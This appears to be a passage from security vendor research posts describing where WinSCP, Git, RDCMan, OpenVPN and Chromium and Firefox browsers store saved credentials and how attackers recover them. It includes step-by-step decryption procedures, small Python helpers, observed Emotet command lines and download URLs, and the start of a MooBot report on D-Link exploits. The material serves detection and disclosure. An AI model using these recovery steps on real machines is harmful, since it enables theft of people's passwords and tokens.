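print(encoded)
print(decode_encoded_command(encoded))
```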

In the decoded script, we can see an attempt to decrypt WinSCP passwords:

Decoded version of PowerShell script used for credential gathering.
Figure 5. PowerShell script for extracting and decrypting WinSCP’s passwords.

Red boxes show how the Credential Gathering Protection module in Cortex XDR identifies a suspicious registry operation.
Figure 6. Cortex XDR prevented attempts to read passwords stored in WinSCP.

Software: Git

Tested version:

2.35.1.windows.2

Where are credentials stored?

Git allows for the use of both passwords and Personal Access Tokens (PATs).

When users want to save time by saving their Git credentials, they can do it using the following command:

git config credential.helper 'store'

Using this command, Git will save the user’s credentials indefinitely on disk, in plain text.

Possible files containing passwords:

  • <userprofile>\.git-credentials
  • <userprofile>\.config\git\credentials

Git allows using PATs as credentials instead of the traditional use of passwords. These tokens are more modular, as any number of access tokens can be created, each with different permissions and expiration dates.

Although it is possible to control users’ actions in a more modular and granular way, each associated with a specific PAT, anyone who has the user’s PAT can view all repositories to which the user has access.

These tokens also appear in cleartext in the same files mentioned above.

How can the credentials be recovered?

Anyone who reads these files will see the username, password or token, and relevant Git repository in plain text.
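To illustrate how little effort reading these files takes, and to give defenders a way to audit them, the sketch below parses the store format, in which each line is a URL with the username and secret embedded. The function name and sample line are hypothetical, and the sketch deliberately reports only whether a secret is present rather than printing it.

```python
from typing import Dict, List
from urllib.parse import unquote, urlsplit


def audit_git_credentials(text: str) -> List[Dict[str, object]]:
    """List host and username for every stored entry, without the secret."""
    entries: List[Dict[str, object]] = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = urlsplit(line)
        if parts.username is None:
            continue  # not a credential line
        entries.append({
            "host": parts.hostname,
            "username": unquote(parts.username),
            "secret_present": parts.password is not None,
        })
    return entries


# Made-up entry in the store format.
print(audit_git_credentials("https://alice:s3cret@git.example.com\n"))
```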

Software: RDCMan

Tested version:

2.83

RDCMan manages multiple remote desktop connections. It is useful for managing server labs where you need regular access to machines, such as automated check-in systems and data centers.

Where are credentials stored?

When a user decides to save a password for a session using RDCMan, it is written to the default configuration file, %localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings

This file is an XML file that contains general metadata about each RDP connection.

Among the data, there is an XML tag called CredentialsProfiles, which has attracted our attention.

We can see that under this tag, there is another one called CredentialsProfiles, and inside there are credentialsProfile XML tags, with a Password tag.

A red box highlights the contents of the Password tag in the credentialsProfile XML tags in RDCMan.settings
Figure 7. Looking at the XML tags in RDCMan.settings

How can the credentials be recovered?

To retrieve the password, we will have to execute commands in the context of the person using the RDCMan program. This is because the password is being saved using the Data Protection API (DPAPI), which enables symmetric encryption and decryption of any kind of data using the functions CryptProtectData and CryptUnprotectData, respectively.

So, to get the password, we need to call the function CryptUnprotectData.

Usually, the only user who can decrypt the data is a user with the same login credentials as the user who encrypted the data.

Although gathering credentials from RDCMan requires one more step from the attacker than was needed in some of our other examples – running the software in the context of the relevant user – there is great value to the result for the attacker. If the effort is successful, it’s possible for the threat actor to get all the users and passwords for all of the machines that this specific user connects to.

Once the attacker is able to execute commands in the context of the user, all that remains in order to gather credentials is to:

  1. Open the RDCMan.settings file and check for the password XML tag.
  2. Decode the string in the tag with base64.
  3. Call CryptUnprotectData with the decoded password string.
  4. Decode the result using UTF-8 (or other relevant formats).
  5. Remove unnecessary null characters.
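The five steps above can be outlined as follows. This is a sketch under stated assumptions, not the tooling shown in the figures: the DPAPI call is passed in as a callable (unprotect) so the example stays portable, the function name is hypothetical, and the tag is matched case-insensitively because the exact casing is not confirmed here.

```python
import base64
import xml.etree.ElementTree as ET
from typing import Callable, List


def recover_passwords(settings_xml: str,
                      unprotect: Callable[[bytes], bytes],
                      encoding: str = "utf-8") -> List[str]:
    """Walk the settings XML and run steps 1 to 5 for each password tag."""
    recovered: List[str] = []
    for node in ET.fromstring(settings_xml).iter():
        if node.tag.lower() != "password" or not node.text:
            continue                                       # step 1
        blob = base64.b64decode(node.text.strip())         # step 2
        plain = unprotect(blob)                            # step 3 (DPAPI)
        text = plain.decode(encoding, errors="replace")    # step 4
        recovered.append(text.replace("\x00", ""))         # step 5
    return recovered


# Stand-in for CryptUnprotectData so the sketch runs anywhere; it ignores
# its input and returns a fixed UTF-16LE value.
fake_unprotect = lambda blob: "Aa123456".encode("utf-16-le")
xml_doc = ("<settings><credentialsProfiles><credentialsProfile>"
           "<password>YmxvYg==</password>"
           "</credentialsProfile></credentialsProfiles></settings>")
print(recover_passwords(xml_doc, fake_unprotect))
```

The stand-in also shows why step 5 is needed: text stored as UTF-16LE but decoded as UTF-8 leaves a null character after every ASCII letter.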

Looking at the example above, the password saved in the file was:

AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAA8/nnW5aFNUi0AKiTG4y9UQAAAAACAAAAAAAQZgAAAAEAACAAAADIjLLw0X4z9RDdWgPpqabLU7hTcJ1HVlFklpzX3eA14QAAAAAOgAAAAAIAACAAAAB01OvDCNCjaEhrq8J8hRm/SKycef7nR52ZkqcPLJqMsCAAAACg2htaeRsutDziS3FISeEAg3DsBpGxBGpPeWlUSVnXOkAAAAB5Tei9g5KWcVIhOKQ2cXxr5ONUOHMEEH5h3Lmp12mPlWaaZ6y8dGIVz8WnNKr4e73dhqNU8NyzI7RZBamS6DG6

And the decrypted password is Aa123456.

The red box highlights the results of password decryption efforts that complete credential gathering targeting RDCMan.
Figure 8. Recovering a password from RDCMan.

Software: OpenVPN

Tested version:

2.5.029

OpenVPN is a virtual private network system that implements techniques to create secure point-to-point or site-to-site connections in routed or bridged configurations and remote access facilities.

Where are credentials stored?

OpenVPN stores the user’s password under the registry key HKCU\software\openvpn-gui\configs\<session_name> in a value called auth-data.

How can the credentials be recovered?

OpenVPN also uses the DPAPI mechanism, with the additional optional entropy parameter (which can be set to NULL).

When an optional entropy DATA_BLOB structure was used in the encryption phase, that same DATA_BLOB structure must be used for the decryption phase.

In the case of OpenVPN, the entropy is saved in a registry value called entropy. The entropy registry value is also stored in the path HKCU\software\openvpn-gui\configs\<session_name>

So, calling CryptUnprotectData with the password from auth-data and entropy (from entropy) will give us the session password.

The entropy registry value contains an extra byte of 00, so we just need to omit it.

Figure 9. Above, the PowerShell script for recovering an OpenVPN password. Below, the way auth-data and entropy registry values are shown via reg.exe (POC).

Software: Chromium-based Browsers

Tested version:

  • Google Chrome – Tested version: 103.0.5060.53 (Official Build) (64-bit)
  • Microsoft Edge – Tested version: 103.0.1264.37 (Official Build) (64-bit)
  • Opera – Tested version: 88.0.4412.53

The Chromium projects include Chromium, the open-source project behind the Google Chrome browser.

In a typical usage routine, many people tend to save passwords while surfing the internet.

The screenshot shows a redacted version of the screen that appears when checking stored passwords in Google Chrome settings.
Figure 10. Passwords saved by Google Chrome Version 102.0.5005.115 (Official Build) (64-bit).

Where are credentials stored?

When using a Chromium-based browser, like Microsoft Edge, Opera or Google Chrome, passwords are located encrypted in an SQLite database file, usually called login data.

Each profile has a password database – its login data file.

The key used to encrypt the passwords is located in the parent folder, in a JSON file called local state.

For example:

login data locations:

  • Google Chrome: %localappdata%\google\chrome\user data\<PROFILE>\login data
  • Microsoft Edge: %localappdata%\microsoft\edge\user data\<PROFILE>\login data
  • Opera: %appdata%\opera software\opera stable\<PROFILE>\login data

local state locations:

  • Google Chrome: %localappdata%\google\chrome\user data\local state
  • Microsoft Edge: %localappdata%\microsoft\edge\user data\local state
  • Opera: %appdata%\opera software\opera stable\local state
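The locations listed above can be assembled programmatically, for example to build a watch list for monitoring. The following is a minimal sketch: the function name, the dictionary layout and the example user alice are hypothetical, and the environment-variable values are passed in explicitly so the sketch does not depend on the machine it runs on.

```python
import ntpath

# Relative locations taken from the lists above.
BROWSER_ROOTS = {
    "Google Chrome": ("localappdata", r"google\chrome\user data"),
    "Microsoft Edge": ("localappdata", r"microsoft\edge\user data"),
    "Opera": ("appdata", r"opera software\opera stable"),
}


def credential_paths(browser: str, profile: str, env: dict) -> dict:
    """Return the login data and local state paths for one browser profile."""
    variable, relative_root = BROWSER_ROOTS[browser]
    root = ntpath.join(env[variable], relative_root)
    return {
        "login data": ntpath.join(root, profile, "login data"),
        "local state": ntpath.join(root, "local state"),
    }


# Example values only; on a real system these come from the environment.
example_env = {
    "localappdata": r"C:\Users\alice\AppData\Local",
    "appdata": r"C:\Users\alice\AppData\Roaming",
}
for name, path in credential_paths("Microsoft Edge", "Default", example_env).items():
    print(f"{name}: {path}")
```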

How can the credentials be recovered?

Each password in the login data database is encrypted using the Advanced Encryption Standard (AES) in Galois/Counter Mode (GCM). AES-GCM is a symmetric encryption method, so the same key is used for both encryption and decryption. The key does not change from block to block: GCM runs AES in counter mode, where each 128-bit block is combined with a keystream derived from the key, a per-message initialization vector (IV) and a block counter. GCM also appends a 16-byte authentication tag to the ciphertext.

To decrypt a password that a Chromium-based browser saves, we need to have:

  1. The encrypted password.
  2. The initialization vector.
  3. The AES key.

Let’s see how we can retrieve each of those:

A. The encrypted password.

Can be exported from the login data database. The encrypted password is taken from the password_value column, from byte offset 15 up to (but not including) the last 16 bytes, which hold the GCM authentication tag: [15:-16]

B. The initialization vector.

Located in the same password_value column, from byte offset 3 up to (but not including) byte offset 15, which is 12 bytes in total: [3:15]

C. The AES key.

Written in the local state JSON file, under the os_crypt key in the encrypted_key value, encoded with base64.

Chromium-based browsers save the AES key using the DPAPI mechanism, so to get it, we will have to decode it from base64 and use CryptUnprotectData in the user’s context.
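The byte offsets given in A and B can be illustrated with a short Python sketch that only slices a blob and performs no decryption. The type and function names are hypothetical, the sample blob is synthetic, and the v10 value used for the first three bytes is an assumption, since the text does not describe them.

```python
from typing import NamedTuple


class PasswordBlob(NamedTuple):
    prefix: bytes      # bytes [0:3], not described further in the text
    iv: bytes          # bytes [3:15], the 12-byte initialization vector
    ciphertext: bytes  # bytes [15:-16], the encrypted password
    tag: bytes         # bytes [-16:], in AES-GCM the authentication tag


def split_password_value(blob: bytes) -> PasswordBlob:
    """Slice a password_value blob at the offsets given in the text."""
    if len(blob) < 3 + 12 + 16:
        raise ValueError("blob is too short to contain a prefix, IV and tag")
    return PasswordBlob(blob[:3], blob[3:15], blob[15:-16], blob[-16:])


# Synthetic blob for illustration only: 3 + 12 + 8 + 16 bytes.
sample = b"v10" + bytes(range(12)) + b"CIPHERTX" + b"T" * 16
parts = split_password_value(sample)
print(len(parts.iv), parts.ciphertext, len(parts.tag))
```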

Example from Google Chrome:

Example from Google Chrome of a password saved in the local state JSON file of Google Chrome. Visible phrases include os_crypt, encrypted_key and password_manager.
Figure 11. Password that is being saved in local state JSON file of Google Chrome.

After base64 decoding, the value starts with a five-letter prefix: DPAPI. This prefix has to be removed before the remaining bytes are passed to CryptUnprotectData.

The decoded password is shown. Highlighted in red at the beginning is a prefix of five letters: DPAPI
Figure 12. The decoded password that was saved in Google Chrome.
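Reading the protected key out of the local state file can be sketched as follows. This is a minimal illustration with hypothetical function names and synthetic file content. It stops before the CryptUnprotectData call, which has to run on Windows in the user's context.

```python
import base64
import json

DPAPI_PREFIX = b"DPAPI"


def extract_protected_key(local_state_text: str) -> bytes:
    """Return the DPAPI-protected key bytes from local state JSON text."""
    state = json.loads(local_state_text)
    decoded = base64.b64decode(state["os_crypt"]["encrypted_key"])
    if not decoded.startswith(DPAPI_PREFIX):
        raise ValueError("encrypted_key does not start with the DPAPI prefix")
    # Strip the five-letter prefix; the remainder is the DPAPI-protected blob.
    return decoded[len(DPAPI_PREFIX):]


# Synthetic local state content; the key bytes here are placeholders.
fake_blob = DPAPI_PREFIX + b"\x01\x02\x03\x04"
fake_state = json.dumps(
    {"os_crypt": {"encrypted_key": base64.b64encode(fake_blob).decode("ascii")}}
)
print(extract_protected_key(fake_state).hex())
```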

If the attacker is able to run in the context of the user, all that is necessary to complete gathering user credentials is:

  1. Copy both login data and local state files.
  2. Get the AES GCM key from the local state JSON file.
  3. Decode the key (base64), remove the DPAPI prefix and decrypt the remaining bytes (CryptUnprotectData).
  4. Decrypt each password in the login data database, using the decrypted AES GCM key.
A proof of concept for recovering passwords that were saved in Chrome - the screenshot shows the outcome of python_Chrome_pass.py, with sensitive information redacted.
Figure 13. POC for recovering passwords that were saved in Chrome.

You can read more about how to extract Chrome passwords in Python.

In the wild

We observed excel.exe using regsvr32.exe to run the following DLL, with this command line:

C:\windows\system32\regsvr32.exe C:\users\<username>\appdata\local\uolegxnwf\kgnkudbadmpogg.dll

(SHA256 of kgnkudbadmpogg.dll: 6599FEE8C7ADF30A00889A7070600F472F8CEAD8EA4DD1A85E724ED15F2AED0F)

After a chain of events, the final payload was trying to access Microsoft Edge credentials files:

  • The login data file (SQLite database file)
    C:\users\<username>\appdata\local\microsoft\edge\user data\default\login data
  • The local state file (contains the encryption key)
    C:\users\<username>\appdata\local\microsoft\edge\user data\local state
Red boxes highlight the Credential Gathering module and the key file paths observed.
Figure 14. Cortex XDR detected attempts to read passwords saved in the Microsoft Edge browser.

Software: Firefox Browser

Tested version:

Firefox Version 101.0.1 (64-bit)

The same password-saving habit applies to other browsers, such as Mozilla Firefox.

Screenshot of stored passwords in Mozilla Firefox with key info redacted.
Figure 15. Passwords that are being saved by Firefox Version 101.0.1 (64-bit).

Where are credentials stored?

Similar to Chromium-based browsers, in the Mozilla Firefox browser, each profile also has its own password file.

This file is called logins.json and is located in %appdata%\mozilla\firefox\profiles\<PROFILE>\logins.json

Both username and password are saved encrypted.

The screenshot shows encryptedUsername and encryptedPassword, among other logins data
Figure 16. Password saved in the logins.json file of Firefox.

How can the credentials be recovered?

Each username and password in the logins.json file is encrypted through the Network Security Services (NSS) library (nss3.dll). Mozilla developed NSS, which exposes its cryptographic operations through the PKCS #11 standard interface.

NSS stores private keys in a file called key3.db or key4.db, depending on the NSS version.

To retrieve the user’s passwords, the attacker will have to access one of these files and the logins.json file.

So, if the attacker is able to run code on the same machine, stealing the passwords involves the following steps:

  1. Copy the logins.json file.
  2. Load the NSS library (nss3.dll).
  3. Decode (base64) the encryptedUsername and encryptedPassword values from the copy of logins.json.
  4. Store each decoded input in a SecItem object, the structure NSS uses to pass blocks of binary data back and forth.
  5. Create SecItem objects for the output.
  6. Decrypt each encryptedUsername and encryptedPassword input object using the PK11 decryption function from nss3.dll, and store the result in the new SecItem output objects.
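The base64 decoding step can be sketched in Python without touching NSS. This is an illustration only: the function name is hypothetical, the sample content is synthetic, and the top-level logins array and hostname field are assumptions about the file layout beyond the two encrypted fields named in the text. The decryption itself is not shown.

```python
import base64
import json


def decode_login_fields(logins_json_text: str) -> list:
    """Base64-decode the encrypted fields of every entry in logins.json text."""
    decoded = []
    for entry in json.loads(logins_json_text).get("logins", []):
        decoded.append(
            {
                "hostname": entry.get("hostname"),
                "username_blob": base64.b64decode(entry["encryptedUsername"]),
                "password_blob": base64.b64decode(entry["encryptedPassword"]),
            }
        )
    return decoded


# Synthetic file content; the blobs are placeholders, not real NSS output.
sample = json.dumps(
    {
        "logins": [
            {
                "hostname": "https://example.test",
                "encryptedUsername": base64.b64encode(b"user-blob").decode("ascii"),
                "encryptedPassword": base64.b64encode(b"pass-blob").decode("ascii"),
            }
        ]
    }
)
for item in decode_login_fields(sample):
    print(item["hostname"], len(item["username_blob"]), len(item["password_blob"]))
```

The decoded blobs are still encrypted. They are the inputs that would be wrapped in SecItem objects in the following steps.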

Unlike the case of Chromium-based browsers, the attacker doesn’t have to run in the target user’s context to get that person’s passwords. Any account that has permission to read the target user’s Firefox profile on the file system is sufficient.

Red boxes highlight where User S is able to gather credentials from User D.
Figure 17. User S got passwords belonging to user D that were saved in Firefox profile 2. (POC)

In the wild

We have seen the following script executed:

A suspicious obfuscated PowerShell script that attempts to gather credentials from Mozilla Firefox.
Figure 18. Suspicious obfuscated PowerShell script.

After decoding:

The deobfuscated PowerShell script reveals a series of links, as shown.
Figure 19. De-obfuscated PowerShell script.

The script:

  1. Creates the folder %localappdata%\ujXgAD
  2. Calls Invoke-WebRequest for each of the links in $Links, trying to download a DLL and save it in the folder created in step 1 with the name rRXqwGvGNR.wTj
  3. Stops after the first successful attempt.

Next, we saw that a DLL was created on the endpoint and regsvr32.exe was used with the following command line:

C:\WINDOWS\system32\regsvr32.exe C:\Users\<USERNAME>\AppData\Local\Temp\..\ujXgAD\rRXqwGvGNR.wTj

Note that the path contains an evasion: by entering the Temp folder and then using \..\ to step back up to the Local folder, the attacker avoids referencing the DLL’s real location directly.
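One way to neutralize this kind of path trick before matching a command line against known locations is to normalize the path first. The following is a minimal sketch: the function name and the user name alice are hypothetical, and Python's ntpath module is used so that Windows path rules apply on any platform.

```python
import ntpath


def normalize_windows_path(path: str) -> str:
    """Collapse '..' segments and lowercase the path for comparison."""
    return ntpath.normcase(ntpath.normpath(path))


observed = r"C:\Users\alice\AppData\Local\Temp\..\ujXgAD\rRXqwGvGNR.wTj"
print(normalize_windows_path(observed))
```

After normalization, the Temp\..\ detour disappears and the path points directly at the ujXgAD folder under Local.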

After using regsvr32.exe:

A. The DLL copies itself to a random folder with a random name, with a DLL extension:
C:\Users\<USERNAME>\AppData\Local\<random_folder_name>\<random_dll_name>.dll

B. The DLL executes several discovery commands:

    1. systeminfo – To list machine information.
    2. ipconfig /all – To list all network interfaces on the machine.
    3. nltest.exe /dclist: – To list all domain controllers in the domain.

C. The DLL creates and executes two files based on certutil.exe with random names:

  1. One of them has a new random name but is still signed by Microsoft.
  2. The other one is a mangled version of certutil – keeping the original name, but with different functionality, and no signature.

D. Step C above is done twice.

Unsigned file SHA256:
A88C344F3F80F8A3EA2E9BA0687FEBCEE2A730FD9AC037D54C4FD21C0AB91039

Certutil SHA256 - Note that this file is benign:
D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889

The unsigned certutil.exe then tries to access password files, both for Chromium-based and Firefox-based browsers.

When checking the links from Figure 19, only two links worked:

DLLs downloaded as part of this credential gathering attack include lw1JF63zARLUV8UwpwGnWpgg.dll and RwuuPYoVei7FkJB.dll
Figure 20. DLLs that we were able to download.
  • First downloaded DLL:
    hxxps://www[.]yell[.]ge/nav_logo/AEnTP/
    Downloaded filename: RwuuPYoVei7FkJB.dll
    (SHA256: A1D513E4A5C83895E5769C994C4D319959EF5AE3F679CE6C0C5211B5BECA7695)
  • Second downloaded DLL:
    hxxps://yakosurf[.]com/wp-includes/S/
    Downloaded filename: lw1JF63zARLUV8UwpwGnWpgg.dll
    (SHA256: 1B8638333751EFCB6B5332C801C11DF0DE3D7077C6ACEA1D663C0302519D7172)

In both cases, it is actually the same DLL, except for a small difference that changes the SHA256 hash.
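The effect of a small difference on the hash can be demonstrated with Python's hashlib. The bytes below are placeholders and not the downloaded DLLs. The sketch only shows that changing a single byte yields an unrelated SHA256 value.

```python
import hashlib

original = b"MZ" + bytes(64)         # placeholder bytes, not a real DLL
modified = original[:-1] + b"\x01"   # same content with the last byte changed

digest_a = hashlib.sha256(original).hexdigest().upper()
digest_b = hashlib.sha256(modified).hexdigest().upper()

# Count how many of the 64 hex characters differ between the two digests.
differing = sum(a != b for a, b in zip(digest_a, digest_b))
print(digest_a)
print(digest_b)
print(f"{differing} of 64 hex characters differ")
```

This is one reason why hash-based indicators alone are easy for attackers to sidestep, and why behavioral detection of the credential file access matters.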

Looking into this sample, we identified the first DLL as part of the Emotet malware family.

Red boxes highlight how the Credential Gathering Protection module identifies key file paths.
Figure 21. Cortex XDR prevented attempts to read passwords saved in the Firefox browser.

Cortex XDR stops this operation synchronously, so the next attack stages are not performed. This malware tries to read passwords in this order: first Firefox, then Microsoft Edge and later, Google Chrome.

For the demonstration, we run Cortex XDR in report mode. We can then see that the Credential Gathering Protection Module also detects attempts to read passwords saved by Chromium-based browsers.

Red boxes highlight how the Cortex XDR Credential Gathering Protection module identifies key file paths.
Figure 22. Cortex XDR detected attempts to read passwords saved in the Microsoft Edge browser.
Red boxes highlight how the Credential Gathering Module identifies key file paths.
Figure 23. Cortex XDR detected attempts to read passwords saved in the Google Chrome browser.

Emotet?

Since we saw two different cases involving Emotet, we looked a bit deeper into this malware family and its methods for third-party credential gathering. We saw that sometimes malware does not even need to implement all of this logic on its own. It can just wrap existing tools, like the WebBrowserPassView Nirsoft tool, to reveal the passwords stored by the web browsers.

WebBrowserPassView.exe shows usernames, passwords and the file path that stores each of them. While sensitive info is redacted, the web browser from which each password was taken is visible.
Figure 24. WebBrowserPassView.exe shows usernames, passwords and the file path that stores each of them.

We can see the login data file for Chromium-based browsers, and the logins.json file for the Firefox browser.

Red boxes highlight how the Credential Gathering Protection module identifies key file paths.
Figure 25. Cortex XDR prevented attempts to read browsers' saved passwords by WebBrowserPassView.exe.

Conclusion

It turns out that the way certain third-party software stores credentials is less secure than we thought. Most of these programs store the user’s credentials on the local disk, in files or registry values. This can be exactly the weak link attackers are looking for, giving them the access they need to attack an organization.

Palo Alto Networks customers using Cortex XDR receive protections using the new Credential Gathering Protection Module for the scenarios described above as well as other credential gathering techniques not mentioned in this write-up. Additional layers of protection – including Local Analysis, Behavioral Threat Protection, BIOC and Analytics BIOC rules – are also available.

Palo Alto Networks customers that use WildFire receive protections from tools implementing these credential gathering attempts.

Nirsoft tools are marked as grayware in WildFire and are blocked by the XDR Agent.

Indicators of Compromise

Unauthorized access to the following registry values
  • HKCU\software\martin prikryl\winscp 2\sessions\<session_name>\Password
  • HKCU\software\openvpn-gui\configs\<session_name>\auth-data
  • HKCU\software\openvpn-gui\configs\<session_name>\entropy
Unauthorized access to the following files
  • <userprofile>\.git-credentials
  • <userprofile>\.config\git\credentials
  • %localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
  • %localappdata%\google\chrome\user data\<PROFILE>\login data
  • %localappdata%\microsoft\edge\user data\<PROFILE>\login data
  • %appdata%\opera software\opera stable\<PROFILE>\login data
  • %localappdata%\google\chrome\user data\local state
  • %localappdata%\microsoft\edge\user data\local state
  • %appdata%\opera software\opera stable\local state
  • %appdata%\mozilla\firefox\profiles\<PROFILE>\logins.json
  • %appdata%\mozilla\firefox\profiles\<PROFILE>\key<3/4>.db
Malicious hashes
6599FEE8C7ADF30A00889A7070600F472F8CEAD8EA4DD1A85E724ED15F2AED0F

A88C344F3F80F8A3EA2E9BA0687FEBCEE2A730FD9AC037D54C4FD21C0AB91039

A1D513E4A5C83895E5769C994C4D319959EF5AE3F679CE6C0C5211B5BECA7695

1B8638333751EFCB6B5332C801C11DF0DE3D7077C6ACEA1D663C0302519D7172
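A minimal sketch of how these indicators could be checked in Python is shown below. The function names are hypothetical, only a subset of the file paths is included, and <PROFILE> is written as a wildcard. Matching a path does not by itself mean the access is unauthorized, since the browsers read these files legitimately.

```python
import fnmatch

MALICIOUS_SHA256 = {
    "6599FEE8C7ADF30A00889A7070600F472F8CEAD8EA4DD1A85E724ED15F2AED0F",
    "A88C344F3F80F8A3EA2E9BA0687FEBCEE2A730FD9AC037D54C4FD21C0AB91039",
    "A1D513E4A5C83895E5769C994C4D319959EF5AE3F679CE6C0C5211B5BECA7695",
    "1B8638333751EFCB6B5332C801C11DF0DE3D7077C6ACEA1D663C0302519D7172",
}

# A subset of the file indicators above, with <PROFILE> written as a wildcard.
SENSITIVE_PATH_PATTERNS = [
    r"*\google\chrome\user data\*\login data",
    r"*\microsoft\edge\user data\*\login data",
    r"*\microsoft\edge\user data\local state",
    r"*\mozilla\firefox\profiles\*\logins.json",
]


def is_known_malicious(sha256_hex: str) -> bool:
    """Case-insensitive lookup of a SHA256 value in the hash list."""
    return sha256_hex.strip().upper() in MALICIOUS_SHA256


def touches_credential_store(path: str) -> bool:
    """Check whether a file path matches one of the credential store patterns."""
    lowered = path.lower()
    return any(fnmatch.fnmatchcase(lowered, p) for p in SENSITIVE_PATH_PATTERNS)


print(is_known_malicious("6599fee8c7adf30a00889a7070600f472f8cead8ea4dd1a85e724ed15f2aed0f"))
print(touches_credential_store(r"C:\Users\bob\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"))
```

In practice, the accessing process would also be checked, so that only reads by something other than the browser itself are flagged.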

Mirai Variant MooBot Targeting D-Link Devices

Executive Summary

In early August, Unit 42 researchers discovered attacks leveraging several vulnerabilities in devices made by D-Link, a company that specializes in network and connectivity products. The vulnerabilities exploited include:

  • CVE-2015-2051: D-Link HNAP SOAPAction Header Command Execution Vulnerability
  • CVE-2018-6530: D-Link SOAP Interface Remote Code Execution Vulnerability
  • CVE-2022-26258: D-Link Remote Command Execution Vulnerability
  • CVE-2022-28958: D-Link Remote Command Execution Vulnerability

If the devices are compromised, they will be fully controlled by attackers, who could utilize those devices to conduct further attacks such as distributed denial-of-service (DDoS) attacks. The exploit attempts captured by Unit 42 researchers leverage the aforementioned vulnerabilities to spread MooBot, a Mirai variant, which targets exposed networking devices running Linux.

While D-Link has published security bulletins regarding all the vulnerabilities mentioned here, some users may be running unpatched or older versions or devices. Unit 42 strongly recommends applying upgrades and patches where possible.

Palo Alto Networks Next-Generation Firewall customers receive protections through cloud-delivered security services such as IoT Security, Advanced Threat Prevention, WildFire and Advanced URL Filtering, which can detect and block the exploit traffic and malware.

Related Unit 42 Topics: IoT, Mirai

Campaign Overview

The whole attack process is shown in Figure 1.

1. Attacker exploits vulnerable devices by leveraging CVE-2015-2051, CVE-2018-6530, CVE-2022-26258 and CVE-2022-28958. 2. The downloader requests the MooBot binary from a remote host. 3. Communication with C2 server. 4. The compromised device launches an attack on other devices based on C2 commands.
Figure 1. Campaign overview.

Exploited Vulnerabilities

Four known vulnerabilities were exploited in this attack. Upon successful exploitation, the wget utility is used to download MooBot samples from the malware infrastructure, and the downloaded binaries are then executed. Vulnerability-related information is shown in Table 1.

ID Vulnerability Description Severity
1 CVE-2015-2051 D-Link HNAP SOAPAction Header Command Execution Vulnerability CVSS Version 2.0: 10.0 High
2 CVE-2018-6530 D-Link SOAP Interface Remote Code Execution Vulnerability CVSS Version 3.0: 9.8 Critical
3 CVE-2022-26258 D-Link Remote Command Execution Vulnerability CVSS Version 3.0: 9.8 Critical
4 CVE-2022-28958 D-Link Remote Command Execution Vulnerability CVSS Version 3.0: 9.8 Critical

Table 1. List of exploited vulnerabilities.

D-Link Exploit Payloads

The attacker exploits four D-Link vulnerabilities that can lead to remote code execution, and uses them to fetch a MooBot downloader from host 159.203.15[.]179.

1. CVE-2015-2051: D-Link HNAP SOAPAction Header Command Execution Vulnerability

CVE-2015-2051 exploit payload, showing the connection to host 159.203.15[.]179, from which a MooBot downloader can be accessed.
Figure 2. CVE-2015-2051 exploit payload.
The exploit targeting the older D-Link routers takes advantage of vulnerabilities in the HNAP SOAP interface. An attacker can perform code execution through a blind OS command injection.

2. CVE-2018-6530: D-Link SOAP Interface Remote Code Execution Vulnerability

CVE-2018-6530 exploit payload, showing the connection to host 159.203.15[.]179, from which a MooBot downloader can be accessed.
Figure 3. CVE-2018-6530 exploit payload.
The exploit works due to the older D-Link router's unsanitized use of the “service” parameters in requests made to the SOAP interface. The vulnerability can be exploited to allow unauthenticated remote code execution.

3. CVE-2022-26258: D-Link Remote Command Execution Vulnerability

CVE-2022-26258 exploit payload, showing the connection to host 159.203.15[.]179, from which a MooBot downloader can be accessed.
Figure 4. CVE-2022-26258 exploit payload.
The exploit targets a command injection vulnerability in the /lan.asp component. The component does not properly sanitize the value of the HTTP parameter DeviceName, which in turn can lead to arbitrary command execution.

4. CVE-2022-28958: D-Link Remote Command Execution Vulnerability

CVE-2022-28958 exploit payload, showing the connection to host 159.203.15[.]179, from which a MooBot downloader can be accessed.
Figure 5. CVE-2022-28958 exploit payload.
The exploit targets a remote command execution vulnerability in the /shareport.php component. The component does not properly sanitize the HTTP parameter named value, which can lead to arbitrary command execution.

Malware Analysis

All the artifacts related to this attack are shown in the following table:

File Name SHA256 Description
rt B7EE57A42C6A4545AC6D6C29E1075FA1628E1D09B8C1572C848A70112D4C90A1 A script downloader. It downloads MooBot onto the compromised system and renames the binary files to Realtek.
wget[.]sh 46BB6E2F80B6CB96FF7D0F78B3BDBC496B69EB7F22CE15EFCAA275F07CFAE075 A script downloader. It downloads MooBot onto the compromised system and renames the binary files to Android.
arc 36DCAF547C212B6228CA5A45A3F3A778271FBAF8E198EDE305D801BC98893D5A MooBot executable file.
arm 88B858B1411992509B0F2997877402D8BD9E378E4E21EFE024D61E25B29DAA08 MooBot executable file.
arm5 D7564C7E6F606EC3A04BE3AC63FDEF2FDE49D3014776C1FB527C3B2E3086EBAB MooBot executable file.
arm6 72153E51EA461452263DBB8F658BDDC8FB82902E538C2F7146C8666192893258 MooBot executable file.
arm7 7123B2DE979D85615C35FCA99FA40E0B5FBCA25F2C7654B083808653C9E4D616 MooBot executable file.
i586 CC3E92C52BBCF56CCFFB6F6E2942A676B3103F74397C46A21697B7D9C0448BE6 MooBot executable file.
i686 188BCE5483A9BDC618E0EE9F3C961FF5356009572738AB703057857E8477A36B MooBot executable file.
mips 4567979788B37FBED6EEDA02B3C15FAFE3E0A226EE541D7A0027C31FF05578E2 MooBot executable file.
mipsel 06FC99956BD2AFCEEBBCD157C71908F8CE9DDC81A830CBE86A2A3F4FF79DA5F4 MooBot executable file.
sh4 4BFF052C7FBF3F7AD025D7DBAB8BD985B6CAC79381EB3F8616BEF98FCB01D871 MooBot executable file.
x86_64 3B12ABA8C92A15EF2A917F7C03A5216342E7D2626B025523C62308FC799B0737 MooBot executable file.

Table 2. Attack-related artifacts.

Unit 42 researchers conducted analysis on the downloaded malware sample. Based on its behavior and patterns, we believe that the malware samples that were hosted on 159.203.15[.]179 relate to a variant of the Mirai botnet called MooBot.

The most recognizable feature of MooBot is that the executable file contains the string w5q6he3dbrsgmclkiu4to18npavj702f, which is used to generate random alphanumeric strings, as shown.
Figure 6. MooBot random string generator.
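The idea of drawing random names from this embedded string can be sketched in Python. This is an illustration under assumptions: the function name is hypothetical, and Python's random module stands in for whatever generator MooBot actually uses, which is not described here.

```python
import random

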